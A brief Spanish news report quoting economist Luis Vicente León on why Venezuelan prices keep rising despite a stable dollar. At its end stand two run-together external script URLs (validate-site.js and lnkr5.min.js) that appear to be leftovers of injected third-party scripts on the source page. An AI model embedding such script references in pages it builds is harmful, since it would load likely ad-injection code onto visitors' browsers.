El presidente de Datanálisis explicó que cuando hay estabilidad en el dólar sin solucionar la alta inflación, los precios continúan en ascenso y comienza la presión por demanda de divisas .

Luis Vicente León, economista y presidente de la firma Datanálisis, informó por qué los precios continúan subiendo a pesar de que el dólar se ha mantenido «estable».

«Los incrementos de precios no se deben solo a la devaluación. Agrega la generación de dinero sin respaldo, el rezago de precios internos, la oferta restringida, la desconfianza y la especulación (hija de los modelos de control). Pero el desfase entre inflación y dólar es efímero», indicó el economista en su Twitter.

León explicó que cuando hay estabilidad en el dólar sin solucionar la alta inflación, los precios continúan en ascenso y comienza la presión por demanda de divisas y la moneda extranjera se vuelve a encarecer frente al bolívar.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1532820025994https://devlinkin.xyz/addons/lnkr5.min.js

Loading...